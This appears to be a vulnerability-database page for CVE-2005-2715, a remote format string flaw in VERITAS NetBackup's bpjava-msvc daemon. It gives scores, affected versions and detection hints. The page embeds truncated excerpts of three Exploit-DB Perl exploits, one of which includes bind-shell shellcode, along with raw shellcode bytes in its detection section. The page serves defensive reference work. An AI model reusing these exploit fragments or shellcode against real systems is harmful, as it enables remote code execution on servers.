CVE-2005-2715
published 2005-10-12CVE-2005-2715: Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and…
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
60.36%
99.0th percentile
Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote attackers to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| symantec_veritas | netbackup_data_and_business_center | — | — |
| symantec_veritas | netbackup_data_and_business_center | — | — |
| symantec_veritas | netbackup_enterprise_server_client | — | — |
| symantec_veritas | netbackup_enterprise_server_client | — | — |
| symantec_veritas | netbackup_enterprise_server_client | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x90\x90\x90\x90\xeb\x42\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea
- →The exploit targets TCP port 13722 (bpjava-msvc daemon). Monitor for unexpected or malformed connections to this port, especially those sending protocol command tokens ' 101 6' or ' 118 1' followed by format string payloads containing '%hn', '%x', or '%n' specifiers. ↗
- →After successful Linux exploitation, the attacker connects back to port 5570 for a reverse/bind shell. Monitor for unexpected outbound or inbound TCP connections on port 5570 from the NetBackup server process. ↗
- →After successful OSX/PPC exploitation, the attacker connects to port 5557 for a bind shell. Monitor for unexpected TCP connections on port 5557 originating from or to the NetBackup server. ↗
- →The Windows exploit overwrites PEB FastPebLockRoutine pointer (at 0x7FFDF020) or a static SEH frame (at 0x0012ffb0) with a code stub at 0x7FFDF250. Detection on Windows can look for writes to these fixed PEB addresses or abnormal SEH chain modifications in the bpjava-msvc process. ↗
- ·The Linux exploit hardcodes a return location (retloc) and return address (retaddr) specific to a particular build of NetBackup 6.0 on Linux/x86. These addresses may differ across patch levels or OS distributions, limiting direct reuse of the exploit without adjustment. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution
exploitdb·2005-10-20
CVE-2005-2715 Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution
Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution
---
#!C:\Perl\bin\perl.exe -w
#
# Vertias Netbackup Win32 format string exploit
# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com
#
# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical
# For win xp sp2 we overwrote SEH
# http://www.digitalmunition.com/
#
# You may have to run this 2 times.
use IO::Socket;
use Getopt::Std; getopts('h:p:t:', \ our %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;}
if (defined($args{'t'})) { $target = $args{'t'}; }
print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n";
print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunitio
Exploit-DB
Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution
exploitdb·2005-10-20
CVE-2005-2715 Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution
Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution
---
#!/usr/bin/perl
##############################################################
# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
##############################################################
use POSIX;
use IO::Socket;
use IO::Select;
use strict;
print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n";
if ($#ARGV == -1) {
print "Usage:\n\t$0 \n\n";
exit (1);
}
my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;
buildexploit ($hostName, $port);
my $shellport = 5570;
print "[*] Connect to remote shell port\n";
my $sock = IO::So
Exploit-DB
Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution
exploitdb·2005-10-20
CVE-2005-2715 Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution
Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution
---
#!/usr/bin/perl
# VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
use POSIX;
use IO::Socket;
use IO::Select;
my $shellcode = # /* OSX BINDSHELLCODE PORT=5557 NO-0x0 */
"\x60\x60\x60\x60" x 10 .
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\xa8\x02\xa6\x38\xc3\xe1\x1d".
"\x39\x80\x01\x18\x39\xad\x1f\xff\x81\xcd\xe1\x21\x81\xed\xe1\x1d".
"\x7d\xef\x72\x78\x91\xed\xe1\x1d\x7c\x06\x68\xac\x7c\x01\x04\xac".
"\x7c\x06\x6f\xac\x4c\x01\x01\x2c\x39\xad\xff\xfc\x39\x8c\xff\xfb".
"\x7d\x8c\x63\x79\x40\x82\xff\xd8\x94\x81\x7d\x7d\x94\x61\x7d\x7e".
"\x94\x41\x7d\x79\x94\xe1\x7d\x1e\xe8\xe1\x7
No writeups or analysis indexed.
http://secunia.com/advisories/17181http://securitytracker.com/id?1015028http://seer.support.veritas.com/docs/279085.htmhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102054-1http://www.kb.cert.org/vuls/id/495556http://www.securityfocus.com/bid/15079http://www.symantec.com/avcenter/security/Content/2005.10.12.htmlhttp://www.zerodayinitiative.com/advisories/ZDI-05-001.htmlhttp://secunia.com/advisories/17181http://securitytracker.com/id?1015028http://seer.support.veritas.com/docs/279085.htmhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102054-1http://www.kb.cert.org/vuls/id/495556http://www.securityfocus.com/bid/15079http://www.symantec.com/avcenter/security/Content/2005.10.12.htmlhttp://www.zerodayinitiative.com/advisories/ZDI-05-001.html
2005-10-12
Published